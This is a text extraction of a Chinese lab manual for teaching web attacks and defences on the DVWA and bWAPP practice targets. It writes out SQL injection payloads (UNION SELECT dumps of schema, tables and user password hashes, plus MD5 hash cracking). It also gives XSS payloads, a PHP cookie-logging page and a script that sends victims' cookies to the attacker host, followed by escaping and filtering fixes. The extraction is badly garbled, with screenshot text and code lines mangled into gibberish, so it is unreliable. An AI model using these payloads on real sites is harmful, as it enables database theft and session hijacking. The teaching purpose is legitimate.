信息安全技术与应用实训指导书.docx

《信息安全技术与应用实训指导书.docx》由会员分享，可在线阅读，更多相关《信息安全技术与应用实训指导书.docx（220页珍藏版）》请在课桌文档上搜索。

1、信息安全发展态势与知识拓展实训项目指导手册目录Web安钿用分析之SQ1.注入及惭配JS1.()()()实脸概述-.2实验环境实验流程.3任务1环境准备任务2判断注入点.5任务3任务4任务5任务6猜测字段数执行Union联合街旬获取数也10*.Web安全应用分析之SQ1.注入及防护配置实验概述SQ1.注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击，而是针对程序员编写时的雄忽，通过SQ1.语句，实现无账号登录,甚至篡改数据库。凡有SQ1.注入漏洞的程序都是因为程序要接受来自客户端用户输入的变用或UR1.传递的参数，并且这个变量或参数是组成SQ1.语句的一部分.DVWA（Da

2、mVu1.nerab1.eWebAPP1.iCation）是用PHP+Mysq1.编写的一套用于常规Web漏洞教学和检测的Web脆弱性测试程序,提供1.ow.Medium.High.Impossib1.e四个安全级别，包含了SQ1.注入、SS,CSRF等常见的Web安全屈洞1.HaCkBar是FirefoX提供的插件，主要功能有：网址的栽入访问、联合直询、各种编码/解码、数据加密等.HaCkBar可以帮助安全人员测试SQ1.注入、XSS.CSRF等安全高同以及网站的安全性.实验环境攻击机：WindowsServer2016（OI-WindoWS攻击机）,IP:192.168.200.130靶机

3、:WindowsServer2016（O1.-Windows攻击机）,IP:192.168.2.130集成环境：PhPStUdy网站：DVWA-v1.10,Iow安全级SI1.前提条件本实睑要求： 熟恐WindoWS基本操作 熟恐基本的SQ1.语句实验流程实验目标完成本实验后，将能够： 了解SQ1.注入原理 掌握基本SQ1.注入方法 掌握SQ1.注入漏洞防护方法任务1环境准备【任务目标】启动动态网站集邮境，并访问SQ1.注入站点.【任务步骤）1 .启动动态网站集成环境双击桌面的Phpstudyrt集成环境，并单击启动按钮,运行网站.2.浏览器访问SQ1.注入站点双击桌面的火狐浏览器，在UR1.

4、地址栏中输入：http127.0.0.1dvwa1.ogin.php输入默认账号和宓码登录网站：账号:admin密码：passwordTDIBBt)CMW|Xaa)a(WGenera1.InstructionsWetoDamnVu1.nerab1.eWebApp1.ication!DvWmoMitcatotMMWMIM*W0QtfMtwM*Wto*4to*i2iWMtCVgVIVMM2agMM-91MU(*4Mt*MMSUMre4M0Mr1.M*MWiX*c*c*wv*rG0*M*rtce*wr4roiMJIWMMtfIve4vkWVrWMMtfMWg.fCv12IWyhmtOMM*eZmto

5、nd。imAdgIUMKweMT7HmwnctVmmMif1.ockmcMZUMCCtrMtapfeIyGdgBvoe*VMun.rm4MKMMWMAMMFMva(MM)FMMhctcmXratMant2Be三(Wf1.MMtMkrV11Mmantintarwadarrtrvrtworr*nattrtctrafWfwrJ*iMv单击左侧菜单导肮栏的SQ1.Injection,进入SQ1.注入页面.Brut*FcewCofMnandMtkmCSItFF1.kInC1.UMoa1.F1.1.1.kMdtowcwCAFTCHAUMfOSuMVu1.nerabi1.ity:SQ1.InjectionM

6、oreInformationMXkVMon(1.M)WukSMk0IDvXS8(00MXSSiIteftoctodIXS(StorCSPBypM*任务2判断注入点【任务目标】利用加单引号等方式，判断页面是否存在注入点。【任务步噱】1.判断是否存在注入点在输入框中，输入：1并单击Submit按钮提交.页面回显了ID为1的用户姓名信息，说明页面正常.继续在输入糖中，输入：1并单击uSubmit按钮提交。页面报错并显示了错误信息，根据错误信息可以了解到此错误为语法错误，数据库类型为MySQ1.e注：因为该站点为字符型注入漏洞，所以需要构造闭合语句.构造如下闭合逻辑语句：1and1=1#可以看到语句能

7、够成功被服务器执行，并显示正常的页面信息.继续构造闭合逻辐语句：1and1=2#可以看到语句能够成功被服务器执行，但页面没有正常信息回显.根据以上执行结果判断，该页面确定存在SQ1.注入漏洞.任务3猜测字段数【任务目标】通过Orderby猜测查询的字段数量。【任务步噱】1.猜测字段数为10构造如下闭合语句：1 ,orderby10#Vu1.nerabi1.ity:SQ1.InjectionUserID:rorderby10,SubmitMoreInformation页面报错，并显示不存在10个长度的字段，说明字段数小于10.因此范围在1到10之间。XMtY)彷史045三()XRD懵Shttp7

8、127.0.bnit-Subrr+127Qo1.IdvwaMncbi1.itiesq1.Wid:UrderbyNO一CSSfUnknOWnCoIUM10in,orderc1.ause2 .猜测字段数为5一般采用二分方法来猜测字段数,如：第一次猜测为100,下一次为50,再下一次为25以此类推，直到猜出正确的字段数.继续构造：1,orderby5#,同样显示错误，说明数量不为5.文件a(E)100历史(三)书？5CB)IRQ)M助（三）http:127.0.bm=SubmgX+,；)127.0.0.1dvwavu1.nerabiIities/sq1.i/?id=+order+by5+%WXCtS

9、Unknownco1.umn,5,inorderc1.ause3 .猜测字段数为3继续构造：1,orderby3#,同样显示错误，说明数量不为3。文件(D：)(y)历史不答(R)IM(Det（三）http1.270.bmit-Sbmit*X+127.0.0.1/dvwa/vu1.nefab1.rties/sq1.i/?d三*orderby3*%C“百StE+KInknOwnco1.umn3inorderc1.ause,4 .猜测字段数为2继续构造：1,orderby2#,页面显示正常，说明字段数量为2.Vu1.nerabi1.ity:SQ1.InjectionUSer10:rorderby2S

10、ubmit：D：1,ordrby2Firstnt:Surneme:retainMoreInformation任务4执行Union联合查询【建目标】通过执行union联合查询，确定回显位苴。【任务步骤】1.构造联合查询语句确定查询字段数量后，可以通过联合直询语句来确定数据回显的位置，最后通过该位置获取数据库中的敏感信息.构造如下语句：1unionse1.ect1.2#,有多少个字段数，se1.ect后面就加上对应的数字。Vu1.nerabi1.ity:SQ1.InjectionU*rIOSutvnrtXD:1.unionse1.ectI,2Firstnane:dinSurnae:anine1.e

11、ct1,2t1V此处的1和2即为回显位置任务5获取数据【任务目标】通过构造并执行unionse1.ect查询语句，获取数据库中的数据信息.【任务步骤】1 .获取数据库相关信息通过内嵌函数version。,database。等获取数据库版本信息和数据库名.构造语句：1unionse1.ectVerSiOnO,database。#Vu1.nerabi1.ity:SQ1.InjectionU*rIDSubmitXD:1*unionse1.ectversionOdatabaseOIFirstnae:dninSurndwe:annID:1.unionse1.ectversion),databasecri

12、60fXMrthwv1.wBBf1.MRTM1.Iiw1. ht!ptfgwfcipdaorQMVSQ1.incton httD,.、；/一；*得到数据库名为：dvwa,MySQ1.数据库版本为5.5.53.2 .获取数据库表名在MySQ1.版本大于5时，默认存在information.schema库，该库中存在其他库的所有数据.根据已经获得的信息，继续构造语句，获取数据库表名：1unionse1.ecttab1.e_name,2frominformation_schema.tab1.eswheretab1.e-schema=,dvwa,#Vu1.nerabi1.ity:SQ1.Injecti

13、onUW1.OSutxntID:1,un100se1.ecttb1.oj4e,2frannfo11Mtonscbev*a.tab1.eswheretab1.escirscnw:dnnSumane:ae,2frcatnforB*t1.onscheM.XAto1.eswheretab1.e*firstnM：9uabsekSurn*M:211XD:1uniona1.cttb1.j*w,2fromInfaxnatian_acbSM.tbIawheretb1._acF15Cne:U3。9rnn9:2-MoreInformation可以看到，在1的回显位置上,显示了两张数据库表名:guestbook,us

14、ers.其中USerS表名存在管理员帐号密码可能性最大.3 .获取字段名继续构造联合查询语句，获取USerS表的字段名：1unionse1.ectco1.umnname,2frominformation.SChema.co1.umnswheretab1.e-schema=dvwa,andtab1.e-name=users#Vu1.nerabi1.ity:SQ1.Injection*M:1337Surnan:843533d7223966d78”cc69216bXD:1unionse1.ectua*r,pAi4wor:Gd1.07d09f5bbe40cadeie5c71e9e9b7XD:&tuni

15、onse1.ecturfpasswordfron9Firstnone:smithySurnewe:Sf4dcc3b5aa76M61d8327882cf99最终得到5个用户的账号和密码，其中包括管理员账号和密码:admin5f4dcc3b5aa765d61d8327deb882cf995 .密码解密由于多数站点的默认:库用户密码加密方式为：MDS哈希算法，而dvwa站点默认也是采用此算法进行密码加密.因此，可以将密码放到在线解空网站进行解密.例如：最终得到admin用户的密码为password任务6SQ1.注入防护【任务目标】通过在页面中加入防护代码，实现对SQ1.注入漏洞的代码级防护效果.【任

16、务步噱】1.mysq1._rea1.eSCaPe_String()函数mysq1._rea1._escape_String()函数可以将用户输入的特殊字符进行转义.转义的特殊字符包括：00（单引号）（双引号）x1.a进入C:phpStudyPHPTutoria1.WWWDVWAvu1.nerabi1.itiessq1.isource文件,三ow.php文件。将$id=$_REQUESTid;修改为$id=mysq1._rea1._escape_string（$_REQUESTid）;6*Mo*F*c4r-MMvr4c1ffDyw)mv*nBMKI*najo*w口恪加acaf.3HM4rt3Ca

17、一3-*。J29?PhPif(isset$REQVESTSumi1.)I：y三q1.-r1.-eC4M*-三trinj/C0ckdAtAtMiJioSquory-SE1.ECTfirstnanatIaStn1.IeQFRCHusersWHEREUgrJd,5d,;*;$ro5u1.tuyiq1.i_query：$G1.OBA1.SIm11y:!iSton-1.SquOry)orde(,r(13Gtv*1.u3SfirscSrowCtiratn.wo-|;$1.ast$row(*1.astnano);16/FZdbaCkforenduser$htn1.-ISnU：.rr.:(S11C3t)i，：

18、19IBysq1.ic1.ose：$G1.OBA1.S(:！5ton*J);保存并退出编辑。2 .验证漏洞修且结果在SQ1.注入页面中，执行1and1=1#语句。可以看到页面已经不再显示任何内容，也没有报错提示，说明漏洞已经修复成功.3 .adds1.ashes()函数adds1.ashes()函数同样可以将特定字符进行转义，从而达到修爱效果.进入C:phpStudyPHPTutoria1.WWWDVWAvu1.nerabi1.itiessq1.isource文件夹，编辑ow.php文件。将$id=$_REQUESTrid;修改为$id=adds1.ashes($_REQUESTid);ATM

19、C*WMA*MFA*aa*rc*1-DXmMXiEV，mv三K1MRIr.IZ1.1M)SVHM4b*C9Ca44r*_J19|$id*oddn.h”J3REQVESfI7J)J/Chockdatabf1.Q$ordieI(I13/Gotva1.ues$first-5row(firstnafo;$1.ast-$row(-1.astnaoe;I16/F00ackforenduserShta1.-*in:ISidhbr/;?：rntnM：(Sfirat)：jrnaM：1S1.ast19I1ay1.o(5G1.O0A1.S(nysq1.i3tonJ);*-UXOIfj118rryMMWVMatAMO

20、至此，实睑结束。大卡工用嗫埼抵街亭坊omWTKMicScuj11wcwna()(K|(11919(1.1.i1.(1202330XSS跨站脚本点击劫持分析及防护概述鹿站脚本攻击XSS(CrossSiteSCriPting)是恶越攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的.XSS攻击针对的是用户层面的攻击，可以用来进行钓鱼攻击、前端js挖叶、用户cookie获取，甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等.XSS跨站脚本攻击分为三类：反射型XSS(ref1.ected)、存储型XSS(StO

21、red)、DOMBasedXSS4本买脸使用的把场环境为：DVWA.bWAPP.实验环境攻击机：WindowsServer2016(O1.-Windows攻击机),IP:192.168.200.130靶机:WindowsServer2016(03-WindoWS即)，IP:192.168.200.156前提条件本实脸要求： 熟怒WindoWS基本操作 熟恐基本的PHP函数和HTM1.标签实验流程反射型XSS泥泥利用、存储型XSS后洞利用实验目标完成本实蛉后,您将能够: 掌握XSS漏洞基本利用方法 掌握利用XSS获取用户cookie的方法 掌握XSS漏洞的代码级防护方法任务1反射型XSS漏洞利用

22、【任务目标】构造XSS代码，触发反射型XSS攻击，并通过反射型XSS漏洞，获取用户cookie信息.注：本实验把场为：DVWA.【任务步骤】1.靶机开启网站环境在靶机上,运行PhpStudy网站环境。2.攻击机访问靶机DVWA站点在攻击机打开浏览器访问httpdvwa1.ogin.php,账号：admin,密码：password女ef)MU*，光茂处H三fiIXDQM-OXj-2JSi-WVKed百St心力3翕6，三163.设置安全等级在DVWA首页，单击左侧菜单栏“DVWASecurity-,将安全等级设省为：Iowe卜1W.I00DVWASecuritySecurity1.v1.SMWVT

23、1.MNHCMrw*1.WIUw-fh*rttovtfat1MwtiEteancWCuVtrrmtob*MnvAc*tMitadCCdngprvrtCMMtdtavw4(MforrtoMcBeoMa*nfK2MW1m9ur1.h*1*)*11nCfMm)2TMCMncAfumMfMrwtMfyacc4wttocenviMaMeVEEaae8TVMMtdt90MJMVZF(CTFQCtfm4HpMMtABevcCgtotmomtMcs*2t)6WS9EIf6w*syBIPHPIDSw0d*ewxt*3rtfysW*dfk*Hvcm&vHvroervuwccMMp9r*MC*1.uMr)OAAgM

24、0EMyZ0C4A，TMbOW119VMwuECWWWWMacavtec11o4 .访问反射型XSS漏洞页面在DVWA首页，单击左侧菜单栏wXSS(Ref1.ected),进入反射型XSS漏洞页MoreInformationtrmrv*?SiMVu1.nerabi1.ity:Ref1.ectedCrossSiteScripting(XSS)5 .执行攻击测试构造XSS代码：a1.ert(/xss/);该代码含义为：执行弹窗m(HD3OatV)Za1.ert(xss);将代码填写到input输入框中，并点击Submit提交。页面成功弹窗，说明攻击代码已被执行.6.获取用户cookiegXSS代码

25、:a1.ert(document.cookie)JWIWDXiov)Ha1.ert(document,ckie)z将代码填写到input输入框中，并点击Submit提交.页面成功弹窗，并将当前用户cookie信息显示在弹窗中，说明成功获取到用户cookie信息.任务2存储型XSS漏洞利用【任务目标】构造XSS代码，触发存储型XSS攻击,并通过存储型XSS漏洞，获取用户cookie信息。注：本实验靶场为：bWAPP.【任务步噱】1.访问bWAPP页面在攻击机打开浏览器访问httpbwapp1.ogin.php,账号：bee,宙码：bug,安全等级设置为：1.ow.2.访问存储型XSS漏洞页面在b

26、WAPP首页,单击右侧下拉框选择Cross-SiteScripting-Stored(BIog)并单击Hack按钮，进入存储型XSS漏洞页面.3.执行攻击测试构造XSS代码:a1.ert(xss);Im*be-已事3丈忖-ki)ms管5V).Ma1.ert(xss):将代码填写到输入框中并点击-Submit进行提交./XSS-Sfcred(BIog)/Ia.EW.tAX01.%提交成功，并且嵌入的代码被执行。此时，代码已经成功被写入到服务器中。因为代码在服务器中永久保存，所以重新访问该漏洞页面，仍然会触发XSS代码./XSS-S+cred/一M3.4XC.I1.iM-14.获取其他用户cook

27、ie(1)编写获取cookie值的页面编写一个可以获取用户cookie数值的页面，并存放到服务器中，具体代码如下：?phpHooki.php$cook-$_GETcookie,；以GET方式获取COokie$ip-$_SERVER(REMOTEADDR,;$timeZ$_SERVERREQUESTTIME；$cookie-strchr($cook,!,);或取字符串$fp=fopw(1.-k-.r,a);将数据写入CXt文本fwrit(Sfp,IP;.$ip.rnCookie:.Scookie.rr.)；fc1.os(5fp);10111213将写好的代码文件存放到攻击机的网站路径中，并创建一

28、个对应名称的txt文档，用来存放其他用户的cookie信息.在攻击机中，运行网站环境.打开浏览器，本地访问获取cookie的页面。Stf)*BWi)ae.pX127001,，、;(2)构造XSS语句构造如下XSS语句,当用户访问存在此代码的存储页面，即可获取该用户cookie信息:document.write()XHnMJ)MgMfV)”川document.write(,)在XSS漏洞页面填写该代码，并提交./XSS-S+ored(BIog)/SuUnitAdd：0Sbowa1.-0tIYour11trywasadddtoourbkgIOwnerOeieEntry5g2022OM3192521

29、代码提交成功，接下来查看cookie.txt文件。2022-0W3-194359I.coofcJINIIScoofc.ux2029/31943IKBcook.tx如Hnknuwiy)mv6:|p：w1.5fCookie:PHPSESSID=qev5cfd27797imeneb0or4eav7IP：192.168.200.158Cookie:PHpSESS1.D=90msikf2qv64qcau3k7rn5q8a6任务3XSS漏洞防护【任务目标】通过在页面中加入防护代码，实现XSS漏洞的代码级防护效果.本节实验环境为：DVWA,安全等级Iow,防护页面为：XSS(RefIected).【任务步骤

30、】1 .黑名单过漉在C:phpStudyPHPTutoria1.WWWDVWAvu1.nerabi1.itiesxss_rsource下编辑1.ow.php漏洞页面，将等关犍词添加到黑名单，代码修改成如下图所示：早”,m，”,S_GET)$_GET,name-!二NU1.1.J/Get.i.nDu1.|$na工PIaU$GET|);/FeedbackforenduserShtm1.-,He1.1.oSname)w;H?测赚名单效果.Vu1.nerabi1.ity:Ref1.ectedCrossSiteScripting(XSS)WnifaVKgySUmt可以看到，包含有（script的部分被替

31、换为空，导致无法触发攻击弹窗效果.2 .函数过源编辑XSS漏洞页面，在用户提交的内容处，添加Hm1.spaciaIchasrsO函数进行防护.早?MPheader(XXSS-Protection:);:/Isthereanyinput?if(arraykyoxi*ts(r.511t,S_GET)“S_GET(n，kJ!-NU1.1.)FnaJne-b51specia1.cbars($_GETiFam,，/FeedbackforenduserShtm1.-wHe1.1.o$naKie|w;H1.?泱赋函数实体化效果.Vu1.nerabi1.ity:Ref1.ectedCrossSiteScripting(XSS)MoreInformationHfJ)o41.ert(99可以看到，由于添加了实体化函数，代码无法被浏览器识SIJ,导致无法触发攻击此时，右键当前页面，单击查看页面源代码。可以看到以及均被函数进行了HTM1.实体化，因此浏览器无法识